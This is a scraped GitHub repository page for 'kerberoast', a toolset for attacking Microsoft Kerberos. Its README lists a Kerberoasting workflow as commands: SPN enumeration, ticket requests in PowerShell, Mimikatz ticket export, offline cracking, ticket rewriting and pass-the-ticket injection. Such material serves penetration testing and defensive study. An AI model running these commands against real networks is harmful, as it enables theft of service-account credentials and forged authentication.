Skip to content

xan7r/kerberoast

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

kerberoast

Kerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each tool does.

Extract all accounts in use as SPN setspn -T medin -Q / | Select-String Users

Request the tickets Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"

Extract from ram with Mimikatz kerberos::list /export

Crack with ./tgsrepcrack.py

Rewrite ./kerberoast.py

Inject back into RAM kerberos::ptt sql.kirbi

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PowerShell 95.7%
  • Python 4.1%
  • Visual Basic .NET 0.2%